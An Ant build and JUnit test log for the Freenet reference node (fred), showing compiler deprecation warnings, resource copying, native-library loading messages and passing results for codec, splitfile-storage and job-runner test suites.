    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:324: warning: [unchecked] unchecked cast
    [javac]             grabArrays = (C[]) new RemoveRandomWithObject[0];
    [javac]                                ^
    [javac]   required: C[]
    [javac]   found:    RemoveRandomWithObject[]
    [javac]   where C,T are type-variables:
    [javac]     C extends RemoveRandomWithObject<T> declared in class SectoredRandomGrabArray
    [javac]     T extends Object declared in class SectoredRandomGrabArray
    [javac] Note: Some input files additionally use or override a deprecated API.
    [javac] Note: Some input files additionally use unchecked or unsafe operations.
    [javac] 100 warnings
     [copy] Copying 393 files to /home/arne/fred-work/build/main/freenet/clients/http/staticfiles
     [copy] Copying 19 files to /home/arne/fred-work/build/main/freenet/l10n
     [copy] Copying 1 file to /home/arne/fred-work/build/main

unit-build:

env:

libdep-junit:

env:

libdep-hamcrest:
    [javac] Compiling 135 source files to /home/arne/fred-work/build/test
    [javac] warning: [path] bad path element "/usr/share/ant-core/lib/xalan.jar": no such file or directory
    [javac] warning: [path] bad path element "/usr/share/junit-4/lib/../../hamcrest-core/lib/hamcrest-core.jar": no such file or directory
    [javac] /home/arne/fred-work/test/freenet/client/CodeTest.java:3: warning: [deprecation] Assert in junit.framework has been deprecated
    [javac] import junit.framework.Assert;
    [javac]                       ^
    [javac] /home/arne/fred-work/test/freenet/client/OnionFECCodecTest.java:8: warning: [deprecation] Assert in junit.framework has been deprecated
    [javac] import junit.framework.Assert;
    [javac]                       ^
    [javac] /home/arne/fred-work/test/freenet/crypt/ciphers/RijndaelTest.java:25: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/test/freenet/support/JVMVersionTest.java:3: warning: [deprecation] Assert in junit.framework has been deprecated
    [javac] import junit.framework.Assert;
    [javac]                       ^
    [javac] /home/arne/fred-work/test/freenet/support/compress/Bzip2CompressorTest.java:17: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/test/freenet/support/compress/GzipCompressorTest.java:30: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/test/freenet/support/compress/NewLzmaCompressorTest.java:16: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/test/freenet/client/CodeTest.java:43: warning: [deprecation] Assert in junit.framework has been deprecated
    [javac]             Assert.assertEquals(src[i], repair[i]);
    [javac]             ^
    [javac] /home/arne/fred-work/test/freenet/client/async/SplitFileInserterStorageTest.java:664: warning: [deprecation] fill(RandomAccessBuffer,Random,long,long) in BucketTools has been deprecated
    [javac]         BucketTools.fill(thing, random, 0, size);
    [javac]                    ^
    [javac] /home/arne/fred-work/test/freenet/client/async/ClientRequestSelectorTest.java:227: warning: [deprecation] fill(RandomAccessBuffer,Random,long,long) in BucketTools has been deprecated
    [javac]         BucketTools.fill(thing, random, 0, size);
    [javac]                    ^
    [javac] /home/arne/fred-work/test/freenet/client/async/ClientRequestSelectorTest.java:231: warning: [serial] serializable class ClientRequestSelectorTest.NullSendableInsert has no definition of serialVersionUID
    [javac]     class NullSendableInsert extends SendableInsert {
    [javac]     ^
    [javac] /home/arne/fred-work/test/freenet/client/async/PersistentJobRunnerImplTest.java:162: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]         jobRunner.queue(w, NativeThread.NORM_PRIORITY);
    [javac]                                        ^
    [javac] /home/arne/fred-work/test/freenet/client/async/PersistentJobRunnerImplTest.java:189: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]         }, NativeThread.NORM_PRIORITY);
    [javac]                        ^
    [javac] /home/arne/fred-work/test/freenet/client/async/SplitFileFetcherStorageTest.java:571: warning: [deprecation] fill(Bucket,Random,long) in BucketTools has been deprecated
    [javac]         BucketTools.fill(b, random, size);
    [javac]                    ^
    [javac] /home/arne/fred-work/test/freenet/crypt/AEADStreamsTest.java:24: warning: [deprecation] fill(Bucket,Random,long) in BucketTools has been deprecated
    [javac]             BucketTools.fill(input, random, 65536);
    [javac]                        ^
    [javac] /home/arne/fred-work/test/freenet/crypt/AEADStreamsTest.java:35: warning: [deprecation] fill(Bucket,Random,long) in BucketTools has been deprecated
    [javac]             BucketTools.fill(input, random, 65536);
    [javac]                        ^
    [javac] /home/arne/fred-work/test/freenet/crypt/AEADStreamsTest.java:45: warning: [deprecation] fill(Bucket,Random,long) in BucketTools has been deprecated
    [javac]         BucketTools.fill(input, random, 512*1024);
    [javac]                    ^
    [javac] /home/arne/fred-work/test/freenet/crypt/PCFBModeTest.java:61: warning: [deprecation] create(BlockCipher) in PCFBMode has been deprecated
    [javac]         PCFBMode ctr = PCFBMode.create(cipher);
    [javac]                                ^
    [javac] /home/arne/fred-work/test/freenet/crypt/PCFBModeTest.java:82: warning: [deprecation] create(BlockCipher) in PCFBMode has been deprecated
    [javac]             PCFBMode ctr = PCFBMode.create(cipher);
    [javac]                                    ^
    [javac] /home/arne/fred-work/test/freenet/crypt/PCFBModeTest.java:120: warning: [deprecation] create(BlockCipher) in PCFBMode has been deprecated
    [javac]             PCFBMode ctr = PCFBMode.create(cipher);
    [javac]                                    ^
    [javac] /home/arne/fred-work/test/freenet/crypt/PCFBModeTest.java:127: warning: [deprecation] create(BlockCipher) in PCFBMode has been deprecated
    [javac]             ctr = PCFBMode.create(cipher);
    [javac]                           ^
    [javac] /home/arne/fred-work/test/freenet/crypt/PCFBModeTest.java:137: warning: [deprecation] create(BlockCipher) in PCFBMode has been deprecated
    [javac]             ctr = PCFBMode.create(cipher);
    [javac]                           ^
    [javac] /home/arne/fred-work/test/freenet/crypt/ciphers/RijndaelTest.java:2010: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]                 Closer.close(is);
    [javac]                 ^
    [javac] /home/arne/fred-work/test/freenet/store/caching/SleepingFreenetStore.java:11: warning: [dep-ann] deprecated item is not annotated with @Deprecated
    [javac] public class SleepingFreenetStore<T extends StorableBlock> extends ProxyFreenetStore<T> {
    [javac]        ^
    [javac] /home/arne/fred-work/test/freenet/support/JVMVersionTest.java:9: warning: [deprecation] Assert in junit.framework has been deprecated
    [javac]         Assert.assertTrue(JVMVersion.isTooOld("1.6.0_32"));
    [javac]         ^
    [javac] /home/arne/fred-work/test/freenet/support/JVMVersionTest.java:10: warning: [deprecation] Assert in junit.framework has been deprecated
    [javac]         Assert.assertTrue(JVMVersion.isTooOld("1.6"));
    [javac]         ^
    [javac] /home/arne/fred-work/test/freenet/support/JVMVersionTest.java:11: warning: [deprecation] Assert in junit.framework has been deprecated
    [javac]         Assert.assertTrue(JVMVersion.isTooOld("1.5"));
    [javac]         ^
    [javac] /home/arne/fred-work/test/freenet/support/JVMVersionTest.java:15: warning: [deprecation] Assert in junit.framework has been deprecated
    [javac]         Assert.assertFalse(JVMVersion.isTooOld("1.7.0_65"));
    [javac]         ^
    [javac] /home/arne/fred-work/test/freenet/support/JVMVersionTest.java:16: warning: [deprecation] Assert in junit.framework has been deprecated
    [javac]         Assert.assertFalse(JVMVersion.isTooOld("1.7"));
    [javac]         ^
    [javac] /home/arne/fred-work/test/freenet/support/JVMVersionTest.java:17: warning: [deprecation] Assert in junit.framework has been deprecated
    [javac]         Assert.assertFalse(JVMVersion.isTooOld("1.8.0_9"));
    [javac]         ^
    [javac] /home/arne/fred-work/test/freenet/support/JVMVersionTest.java:18: warning: [deprecation] Assert in junit.framework has been deprecated
    [javac]         Assert.assertFalse(JVMVersion.isTooOld("1.10"));
    [javac]         ^
    [javac] /home/arne/fred-work/test/freenet/support/JVMVersionTest.java:22: warning: [deprecation] Assert in junit.framework has been deprecated
    [javac]         Assert.assertFalse(JVMVersion.isTooOld(null));
    [javac]         ^
    [javac] /home/arne/fred-work/test/freenet/support/ListUtilsTest.java:100: warning: [serial] serializable class NotRandomAlwaysTop has no definition of serialVersionUID
    [javac]     static class NotRandomAlwaysTop extends Random {
    [javac]            ^
    [javac] /home/arne/fred-work/test/freenet/support/ListUtilsTest.java:107: warning: [serial] serializable class NotRandomAlwaysZero has no definition of serialVersionUID
    [javac]     static class NotRandomAlwaysZero extends Random {
    [javac]            ^
    [javac] /home/arne/fred-work/test/freenet/support/MemoryLimitedJobRunnerTest.java:28: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]             return NativeThread.NORM_PRIORITY;
    [javac]                                ^
    [javac] /home/arne/fred-work/test/freenet/support/MemoryLimitedJobRunnerTest.java:210: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]             return NativeThread.NORM_PRIORITY;
    [javac]                                ^
    [javac] /home/arne/fred-work/test/freenet/support/PrioritizedSerialExecutorTest.java:54: warning: [deprecation] MAX_PRIORITY in NativeThread has been deprecated
    [javac]         exec = new PrioritizedSerialExecutor(NativeThread.MAX_PRIORITY, 10, 5, true);
    [javac]                                                          ^
    [javac] /home/arne/fred-work/test/freenet/support/SerialExecutorTest.java:10: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]         SerialExecutor exec = new SerialExecutor(NativeThread.NORM_PRIORITY);
    [javac]                                                              ^
    [javac] /home/arne/fred-work/test/freenet/support/SerialExecutorTest.java:30: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]                 return NativeThread.NORM_PRIORITY;
    [javac]                                    ^
    [javac] /home/arne/fred-work/test/freenet/support/SimpleFieldSetTest.java:739: warning: [cast] redundant cast to String
    [javac]             assertTrue(isAKey(SAMPLE_STRING_PAIRS, "", (String)itr.next()));
    [javac]                                                        ^
    [javac] /home/arne/fred-work/test/freenet/support/compress/Bzip2CompressorTest.java:142: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(decompressorInput);
    [javac]             ^
    [javac] /home/arne/fred-work/test/freenet/support/compress/Bzip2CompressorTest.java:143: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(decompressorOutput);
    [javac]             ^
    [javac] /home/arne/fred-work/test/freenet/support/compress/Bzip2CompressorTest.java:162: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(decompressorInput);
    [javac]             ^
    [javac] /home/arne/fred-work/test/freenet/support/compress/Bzip2CompressorTest.java:163: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(decompressorOutput);
    [javac]             ^
    [javac] /home/arne/fred-work/test/freenet/support/compress/GzipCompressorTest.java:150: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(decompressorInput);
    [javac]             ^
    [javac] /home/arne/fred-work/test/freenet/support/compress/GzipCompressorTest.java:151: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(decompressorOutput);
    [javac]             ^
    [javac] /home/arne/fred-work/test/freenet/support/compress/GzipCompressorTest.java:169: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(decompressorInput);
    [javac]             ^
    [javac] /home/arne/fred-work/test/freenet/support/compress/GzipCompressorTest.java:170: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(decompressorOutput);
    [javac]             ^
    [javac] /home/arne/fred-work/test/freenet/support/compress/NewLzmaCompressorTest.java:159: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(decompressorInput);
    [javac]             ^
    [javac] /home/arne/fred-work/test/freenet/support/compress/NewLzmaCompressorTest.java:160: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(decompressorOutput);
    [javac]             ^
    [javac] /home/arne/fred-work/test/freenet/support/io/TempBucketFactoryRAFBase.java:35: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]     private Executor exec = new SerialExecutor(NativeThread.NORM_PRIORITY);
    [javac]                                                            ^
    [javac] /home/arne/fred-work/test/freenet/support/io/TempBucketFactoryRAFBase.java:323: warning: [cast] redundant cast to TempBucketFactory.TempBucket
    [javac]             return ((TempFileBucket)(((TempBucket) bucket).getUnderlying())).getFile();
    [javac]                                       ^
    [javac] /home/arne/fred-work/test/freenet/support/io/TempBucketTest.java:38: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]         private Executor exec = new SerialExecutor(NativeThread.NORM_PRIORITY);
    [javac]                                                                ^
    [javac] /home/arne/fred-work/test/freenet/support/io/TempBucketTest.java:160: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]         private Executor exec = new SerialExecutor(NativeThread.NORM_PRIORITY);
    [javac]                                                                ^
    [javac] 56 warnings
     [copy] Copying 84 files to /home/arne/fred-work/build/test/freenet/client/filter/png
     [copy] Copying 15 files to /home/arne/fred-work/build/test/freenet/client/filter/bmp
     [copy] Copying 12 files to /home/arne/fred-work/build/test/freenet/crypt/ciphers/rijndael-gladman-test-data
     [copy] Copying 3 files to /home/arne/fred-work/build/test/freenet/l10n

unit:
    [junit] WARNING: multiple versions of ant detected in path for junit 
    [junit]          jar:file:/usr/share/ant-core/lib/ant.jar!/org/apache/tools/ant/Project.class
    [junit]      and jar:file:/home/arne/.ant/lib/ant.jar!/org/apache/tools/ant/Project.class
    [junit] Running freenet.client.CodeTest
    [junit] Testsuite: freenet.client.CodeTest
    [junit] Attempting to deploy Native FEC for linux-x86_64
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 7,797 sec
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 7,797 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to deploy Native FEC for linux-x86_64
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testSimpleRev took 3,249 sec
    [junit] Testcase: testBenchmark took 0,007 sec
    [junit] Testcase: testShifted took 3,643 sec
    [junit] Testcase: testSimple took 0,325 sec
    [junit] Running freenet.client.DefaultMIMETypesTest
    [junit] Testsuite: freenet.client.DefaultMIMETypesTest
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,024 sec
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,024 sec
    [junit] 
    [junit] Testcase: testParams took 0,147 sec
    [junit] Testcase: testFullList took 0,269 sec
    [junit] Running freenet.client.FailureCodeTrackerTest
    [junit] Testsuite: freenet.client.FailureCodeTrackerTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,555 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,555 sec
    [junit] 
    [junit] Testcase: testSize took 0,102 sec
    [junit] Running freenet.client.FetchContextTest
    [junit] Testsuite: freenet.client.FetchContextTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,586 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,586 sec
    [junit] 
    [junit] Testcase: testPersistence took 0,155 sec
    [junit] Running freenet.client.OnionFECCodecTest
    [junit] Testsuite: freenet.client.OnionFECCodecTest
    [junit] Tests run: 8, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 41,276 sec
    [junit] Tests run: 8, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 41,276 sec
    [junit] 
    [junit] Testcase: testDecodeNoneDecoded took 2,784 sec
    [junit] Testcase: testDecodeRandomSubset took 30,79 sec
    [junit] Testcase: testDecodeThrowsOnNotPaddedLastBlock took 0,476 sec
    [junit] Testcase: testEncodeThrowsOnNotPaddedLastBlock took 0,027 sec
    [junit] Testcase: testManyDataFewCheck took 0,86 sec
    [junit] Testcase: testDecodeAlreadyDecoded took 0,937 sec
    [junit] Testcase: testManyCheckFewData took 0,763 sec
    [junit] Testcase: testRandomDataCheckCounts took 4,127 sec
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] Running freenet.client.async.ClientRequestSelectorTest
    [junit] Testsuite: freenet.client.async.ClientRequestSelectorTest
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi1841931918231409357lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12166485ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12280268ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 11,736 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 11,736 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12166485ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12280268ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testSmallSplitfileChooseCompletion took 11,444 sec
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] Running freenet.client.async.PersistentJobRunnerImplTest
    [junit] Testsuite: freenet.client.async.PersistentJobRunnerImplTest
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,59 sec
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,59 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testWaitForCheckpoint took 0,052 sec
    [junit] Testcase: testDisabledCheckpointing took 0,014 sec
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] Running freenet.client.async.SplitFileFetcherStorageTest
    [junit] Testsuite: freenet.client.async.SplitFileFetcherStorageTest
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi6316287223875696332lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12272226ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12251649ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] Blocks: 1 2 5 7 8
    [junit] Blocks: 5 6 7 8
    [junit] Blocks: 0 2 4 5 6 7 8 11 13 15 16 17 18 19
    [junit] Blocks: 0 3 5 7 9 11 17
    [junit] Blocks: 1 4 8 9 10 11 14 15 16 17
    [junit] Tests run: 11, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 193,881 sec
    [junit] Tests run: 11, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 193,881 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12272226ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12251649ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] Blocks: 1 2 5 7 8
    [junit] Blocks: 5 6 7 8
    [junit] Blocks: 0 2 4 5 6 7 8 11 13 15 16 17 18 19
    [junit] Blocks: 0 3 5 7 9 11 17
    [junit] Blocks: 1 4 8 9 10 11 14 15 16 17
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testPersistenceReloadThenChooseKey took 11,545 sec
    [junit] Testcase: testWriteReadSegmentKeys took 0,254 sec
    [junit] Testcase: testPersistenceReload took 0,096 sec
    [junit] Testcase: testChooseKeyThreeTries took 0,084 sec
    [junit] Testcase: testPersistenceReloadThenFetch took 0,219 sec
    [junit] Testcase: testPersistenceReloadBetweenChooseKey took 0,159 sec
    [junit] Testcase: testMultiSegment took 3,317 sec
    [junit] Testcase: testChooseKeyCooldown took 0,388 sec
    [junit] Testcase: testPersistenceReloadBetweenFetches took 0,266 sec
    [junit] Testcase: testSingleSegment took 176,969 sec
    [junit] Testcase: testChooseKeyOneTry took 0,093 sec
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Running freenet.client.async.SplitFileInserterStorageTest
    [junit] Testsuite: freenet.client.async.SplitFileInserterStorageTest
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi5142930070342381907lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 11976766ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12197192ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] Tests run: 26, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 226,95 sec
    [junit] Tests run: 26, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 226,95 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 11976766ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12197192ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testPersistentSmallSplitfileNoLastBlockFailAfterResume took 10,493 sec
    [junit] Testcase: testCancelAltCrossSegment took 7,594 sec
    [junit] Testcase: testSmallSplitfileFailureFatalError took 0,179 sec
    [junit] Testcase: testSmallSplitfileConsecutiveRNFsHackFailure took 0,111 sec
    [junit] Testcase: testEncodeAfterShutdownCrossSegment took 0,003 sec
    [junit] Testcase: testPersistentSmallSplitfileNoLastBlockCompletionAfterResume took 0,492 sec
    [junit] Testcase: testPersistentSmallSplitfileWithLastBlockCompletionAfterResume took 0,311 sec
    [junit] Testcase: testSmallSplitfileChooseCooldown took 0,489 sec
    [junit] Testcase: testRoundTripOneBlockSegment took 18,965 sec
